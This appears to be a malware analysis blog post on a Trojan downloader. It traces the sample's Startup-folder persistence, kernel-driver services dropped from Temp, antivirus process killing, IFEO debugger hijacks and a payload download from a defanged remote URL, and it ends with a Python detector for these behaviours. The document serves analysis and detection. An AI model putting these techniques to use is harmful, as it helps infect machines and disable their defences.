[Trojan-Downloader.Win32.Small.mjy]-[MicroPoint]-ogame.exe analysis
2008-03-16 11:55
Same as the several viruses downloaded from the it.thtf site; only the packer differs somewhat. Picking ogame.exe for analysis:

Packer identification: NsPacK V3.7 -> LiuXingPing * Sign.By.fly *

1. Unpacking: the jump to the OEP and the first instructions there

    00418432 ^\E9 C98BFEFF    jmp ogame.00401000
    oep:
    00401000 81EC 1C070000    sub esp,71C
    00401006 55               push ebp
    00401007 56               push esi
    00401008 57               push edi
    00401009 B9 0E000000      mov ecx,0E
    0040100E BE C88E4000      mov esi,ogame.00408EC8
    00401013 8DBC24 14020000  lea edi,dword ptr ss:[esp+214]
    0040101A F3:A5            rep movs dword ptr es:[edi],dword ptr ds:[esi]

2. Is the running image C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe?

2.1 If not: copy itself there:

    00401162 FF15 2C304000    call dword ptr ds:[40302C]  ; KERNEL32.CopyFileA
    0012F890 0012FCB8 |ExistingFileName = "C:\DOCUME~1\gao1\桌面\ogame.exe"
    0012F894 0012F8A8 |NewFileName = "C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe"

Start the copy as a new process:

    00401197 FF15 24304000    call dword ptr ds:[403024]  ; KERNEL32.CreateProcessA
    0012F874 0012F8A8 |ModuleFileName = "C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe"

Then clean up and exit:

    00402187 FF15 24304000    call dword ptr ds:[403024]  ; KERNEL32.CreateProcessA
    0012F300 0012F74C |ModuleFileName = "c:\_uninsep.bat"
    00401365 6A 00            push 0
    00401367 FF15 98304000    call dword ptr ds:[403098]  ; KERNEL32.GetCurrentProcess
    0040136D 50               push eax
    0040136E FF15 A0304000    call dword ptr ds:[4030A0]  ; KERNEL32.TerminateProcess

2.2 If yes:

2.2.1 Create a system service named "Sc Manager":

Create usbcams3.sys:

    004013A8 FF15 9C304000    call dword ptr ds:[40309C]  ; KERNEL32.CreateFileA
    0012F868 0012FDBC |FileName = "C:\DOCUME~1\gao1\LOCALS~1\Temp\usbcams3.sys"
    0012F86C 004013CD /CALL 到 WriteFile 来自 Display3.004013C7
    0012F870 0000005C |hFile = 0000005C (window)
    0012F874 00407B28 |Buffer = Display3.00407B28
    0012F878 00001300 |nBytesToWrite = 1300 (4864.)
    0012F87C 0012F894 |pBytesWritten = 0012F894
    0012F880 00000000 \pOverlapped = NULL

Create the service "Sc Manager"; once the driver is loaded, the .sys file is deleted:

    0012F838 00401447 /CALL 到 CreateServiceA 来自 Display3.00401441
    0012F83C 001493D0 |hManager = 001493D0
    0012F840 00408E98 |ServiceName = "Sc Manager"
    0012F844 00408E98 |DisplayName = "Sc Manager"
    0012F848 000F01FF |DesiredAccess = SERVICE_ALL_ACCESS
    0012F84C 00000001 |ServiceType = SERVICE_KERNEL_DRIVER
    0012F850 00000003 |StartType = SERVICE_DEMAND_START
    0012F854 00000000 |ErrorControl = SERVICE_ERROR_IGNORE
    0012F858 0012FDBC |BinaryPathName = "C:\DOCUME~1\gao1\LOCALS~1\Temp\usbcams3.sys"
    0012F85C 00000000 |LoadOrderGroup = NULL
    0012F860 00000000 |pTagId = NULL
    0012F864 00000000 |pDependencies = NULL
    0012F868 00000000 |ServiceStartName = NULL
    0012F86C 00000000 \Password = NULL

2.2.2 Create threads:

    0012F87C 004011EC /CALL 到 CreateThread 来自 Display3.004011EA
    0012F880 00000000 |pSecurity = NULL
    0012F884 00000000 |StackSize = 0
    0012F888 00401FB0 |ThreadFunction = Display3.00401FB0  ; deals with avp: enumerates processes and kills avp.exe
    0012F88C 00000000 |pThreadParm = NULL
    0012F890 00000000 |CreationFlags = 0
    0012F894 00000000 \pThreadId = NULL

    0012F87C 004011FD /CALL 到 CreateThread 来自 Display3.004011FB
    0012F880 00000000 |pSecurity = NULL
    0012F884 00000000 |StackSize = 0
    0012F888 00401C60 |ThreadFunction = Display3.00401C60  ; hammers the registry with writes
    0012F88C 00000000 |pThreadParm = NULL
    0012F890 00000000 |CreationFlags = 0
    0012F894 00000000 \pThreadId = NULL

It writes the following registry entries to perform image file execution hijacking (IFEO Debugger values):

    20.12495804 Display3D.exe:1232 SetValue HKLM\SYSTEM\CURRENTCONTROLSET\ENUM\ACPI_HAL\PNP0C08\0\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com\Debugger ACCESS VIOLATION
    ...
    58.65472794 Display3D.exe:1232 SetValue HKLM\SYSTEM\CURRENTCONTROLSET\ENUM\ACPI_HAL\PNP0C08\0\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinDbg.exe\Debugger ACCESS VIOLATION
    58.67476654 Display3D.exe:1232 SetValue HKLM\SYSTEM\CURRENTCONTROLSET\ENUM\ACPI_HAL\PNP0C08\0\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger ACCESS VIOLATION
    58.69480133 Display3D.exe:1232 SetValue HKLM\SYSTEM\CURRENTCONTROLSET\ENUM\ACPI_HAL\PNP0C08\0\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger ACCESS VIOLATION

2.2.3 Create the file usbhcid.sys:

    0012F888 0012FEC0 ASCII "C:\DOCUME~1\gao1\LOCALS~1\Temp\usbhcid.sys"
    0012F85C 004013CD /CALL 到 WriteFile 来自 Display3.004013C7
    0012F860 000000A0 |hFile = 000000A0 (window)
    0012F864 00405228 |Buffer = Display3.00405228
    0012F868 00002900 |nBytesToWrite = 2900 (10496.)
    0012F86C 0012F884 |pBytesWritten = 0012F884
    0012F870 00000000 \pOverlapped = NULL

Create the service "iCafe Manager"; the .sys file is deleted after loading:

    0012F828 00401447 /CALL 到 CreateServiceA 来自 Display3.00401441
    0012F82C 00149A88 |hManager = 00149A88
    0012F830 00408E88 |ServiceName = "iCafe Manager"
    0012F834 00408E88 |DisplayName = "iCafe Manager"
    0012F838 000F01FF |DesiredAccess = SERVICE_ALL_ACCESS
    0012F83C 00000001 |ServiceType = SERVICE_KERNEL_DRIVER
    0012F840 00000003 |StartType = SERVICE_DEMAND_START
    0012F844 00000000 |ErrorControl = SERVICE_ERROR_IGNORE
    0012F848 0012FEC0 |BinaryPathName = "C:\DOCUME~1\gao1\LOCALS~1\Temp\usbhcid.sys"
    0012F84C 00000000 |LoadOrderGroup = NULL
    0012F850 00000000 |pTagId = NULL
    0012F854 00000000 |pDependencies = NULL
    0012F858 00000000 |ServiceStartName = NULL
    0012F85C 00000000 \Password = NULL

2.2.4 Defeat the restore software:

Open the device \\.\yyy2 for writing:

    0012F730 00401745 /CALL 到 CreateFileA 来自 Display3.0040173F
    0012F734 0012F75C |FileName = "\\.\yyy2"
    0012F738 C0000000 |Access = GENERIC_READ|GENERIC_WRITE
    0012F73C 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
    0012F740 00000000 |pSecurity = NULL
    0012F744 00000003 |Mode = OPEN_EXISTING
    0012F748 00000000 |Attributes = 0
    0012F74C 00000000 \hTemplateFile = NULL

Communicate with it:

    0012F72C 00401780 /CALL 到 DeviceIoControl 来自 Display3.0040177A
    0012F730 000000A4 |hDevice = 000000A4 (window)
    0012F734 8000F800 |IoControlCode = 8000F800
    0012F738 0012F77C |InBuffer = 0012F77C
    0012F73C 0000000C |InBufferSize = C (12.)
    0012F740 00000000 |OutBuffer = NULL
    0012F744 00000000 |OutBufferSize = 0
    0012F748 0012F758 |pBytesReturned = 0012F758
    0012F74C 00000000 \pOverlapped = NULL

Copy itself across:

    0012F888 00401289 /CALL 到 CopyFileA 来自 Display3.00401287
    0012F88C 0012FCB8 |ExistingFileName = "C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\DISPLA~1.EXE"
    0012F890 0012F8A8 |NewFileName = "C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe"
    0012F894 00000000 \FailIfExists = FALSE

    0012F888 00401300 /CALL 到 CopyFileA 来自 Display3.004012FE
    0012F88C 0012F8A8 |ExistingFileName = "C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe"
    0012F890 0012F9AC |NewFileName = "\\.\yyy2\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe"
    0012F894 00000000 \FailIfExists = FALSE

    0012F888 0040132A /CALL 到 OpenMutexA 来自 Display3.00401324
    0012F88C 001F0001 |Access = 1F0001
    0012F890 00000000 |Inheritable = FALSE
    0012F894 00408E58 \MutexName = "SH0FJ_NET_PSOFJEIF__FJE3345FEF_HM"

    0012F860 0040218D /CALL 到 CreateProcessA 来自 Display3.00402187
    0012F864 0012F8A8 |ModuleFileName = "C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe"
    0012F868 00000000 |CommandLine = NULL
    0012F86C 00000000 |pProcessSecurity = NULL
    0012F870 00000000 |pThreadSecurity = NULL
    0012F874 00000000 |InheritHandles = FALSE
    0012F878 00000000 |CreationFlags = 0
    0012F87C 00000000 |pEnvironment = NULL
    0012F880 00000000 |CurrentDir = NULL
    0012F884 0014A1F8 |pStartupInfo = 0014A1F8
    0012F888 00147B78 \pProcessInfo = 00147B78

    0012F88C 0040134B /CALL 到 CreateMutexA 来自 Display3.00401345
    0012F890 00000000 |pSecurity = NULL
    0012F894 00000000 |InitialOwner = FALSE
    0012F898 00408E58 \MutexName = "SH0FJ_NET_PSOFJEIF__FJE3345FEF_HM"

2.2.5 Download the virus with URLDownloadToFileA:

    0012F880 0040135C /CALL 到 CreateThread 来自 Display3.0040135A
    0012F884 00000000 |pSecurity = NULL
    0012F888 00000000 |StackSize = 0
    0012F88C 00401D20 |ThreadFunction = Display3.00401D20  ; downloads the virus
    0012F890 00000000 |pThreadParm = NULL
    0012F894 00000000 |CreationFlags = 0
    0012F898 00000000 \pThreadId = NULL

Download list:

    00401DFD push Display3.00405020  ; ASCII "hxxp://www.qisihuisheng.net/new.txt"

Saved locally under the name:

    00C9FB74 00C9FBA8 ASCII "C:\WINNT\system32\WIN.INI"

Then it returns to the same clean-up work as before.
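Three behaviours in this analysis are cheap to spot in a file/registry monitor trace: the copy into the All Users Startup folder (2.1), the .sys drops into the Temp directory that are then registered as kernel-driver services (2.2.1, 2.2.3), and the IFEO Debugger writes aimed at avp.com, WinDbg.exe, nod32kui.exe and nod32.exe (2.2.2). Note that the writes recorded above went to a key under HKLM\SYSTEM\...\ENUM\ACPI_HAL\... rather than the standard Image File Execution Options key and were logged as ACCESS VIOLATION, so a detector should match the key suffix rather than a fixed prefix and should report attempts as well as successes. The script below is an added example, not code from the original post: it parses constructed monitor lines modelled on the RegMon-style lines quoted above (the `time process:pid operation path result` layout, the rule names, and every sample line other than the first are my assumptions) and flags all three behaviours.

```python
import re
from dataclasses import dataclass

# Constructed sample, modelled on the monitor lines quoted in the analysis.
# Only the first line mirrors the trace above; the rest are invented to
# exercise the other rules and are not captured data.
SAMPLE_LOG = r"""
20.12495804 Display3D.exe:1232 SetValue HKLM\SYSTEM\CURRENTCONTROLSET\ENUM\ACPI_HAL\PNP0C08\0\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com\Debugger ACCESS VIOLATION
31.00000000 Display3D.exe:1232 SetValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger SUCCESS
32.00000000 Display3D.exe:1232 CreateFile C:\DOCUME~1\gao1\LOCALS~1\Temp\usbcams3.sys SUCCESS
33.00000000 ogame.exe:1100 CopyFile C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe SUCCESS
34.00000000 explorer.exe:1500 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop SUCCESS
"""

# Result tokens may contain spaces, so the line regex anchors on a known set.
RESULTS = ("SUCCESS", "ACCESS VIOLATION", "ACCESS DENIED", "NOT FOUND", "BUFFER OVERFLOW")
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proc>\S+?):(?P<pid>\d+)\s+(?P<op>\S+)\s+(?P<path>.+?)\s+(?P<result>"
    + "|".join(re.escape(r) for r in RESULTS) + r")$"
)

# Match the IFEO suffix anywhere in the path: the trace above shows the writes
# landing under a non-standard prefix, and a prefix-only match would miss them.
IFEO_RE = re.compile(r"\\Image File Execution Options\\(?P<target>[^\\]+)\\Debugger$", re.IGNORECASE)
STANDARD_IFEO_PREFIX = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options".upper()
# Startup folder in both the English and the Chinese short-name form seen above.
STARTUP_RE = re.compile(r"\\(Start Menu|「开始~1)\\(Programs|程序)\\(Startup|启动)\\", re.IGNORECASE)
TEMP_SYS_RE = re.compile(r"\\Temp\\[^\\]+\.sys$", re.IGNORECASE)
# Security-tool image names that appear in the analysis.
SECURITY_TOOLS = {"avp.exe", "avp.com", "nod32.exe", "nod32kui.exe", "windbg.exe"}
FILE_OPS = ("CreateFile", "CopyFile", "WriteFile")


@dataclass
class Event:
    ts: str
    process: str
    pid: int
    op: str
    path: str
    result: str


@dataclass
class Finding:
    rule: str
    process: str
    pid: int
    target: str
    succeeded: bool
    note: str = ""


def parse_log(text):
    """Parse monitor lines into Events, skipping blank or unrecognised lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        m = LINE_RE.match(line) if line else None
        if m:
            events.append(Event(m["ts"], m["proc"], int(m["pid"]), m["op"], m["path"], m["result"]))
    return events


def analyze(text):
    """Run the three behaviour rules over the trace and return the findings in order."""
    findings = []
    for ev in parse_log(text):
        ok = ev.result == "SUCCESS"
        m = IFEO_RE.search(ev.path)
        if ev.op == "SetValue" and m:
            target = m["target"]
            notes = []
            if target.lower() in SECURITY_TOOLS:
                notes.append("targets a security tool")
            if not ev.path.upper().startswith(STANDARD_IFEO_PREFIX):
                notes.append("non-standard key prefix")
            findings.append(Finding("ifeo_debugger", ev.process, ev.pid, target, ok, "; ".join(notes)))
        elif ev.op in FILE_OPS and STARTUP_RE.search(ev.path):
            findings.append(Finding("startup_folder_drop", ev.process, ev.pid, ev.path, ok))
        elif ev.op in FILE_OPS and TEMP_SYS_RE.search(ev.path):
            findings.append(Finding("driver_in_temp", ev.process, ev.pid, ev.path, ok,
                                    "kernel driver written to a temp directory"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        state = "succeeded" if f.succeeded else "attempted"
        print(f"[{f.rule}] {f.process}:{f.pid} {state} -> {f.target} {f.note}")
```

Failed IFEO writes are reported alongside successful ones because the attempt itself identifies the process as hostile to the listed security tools; on a live host the same suffix match can be applied to a registry export to find Debugger values that were actually written.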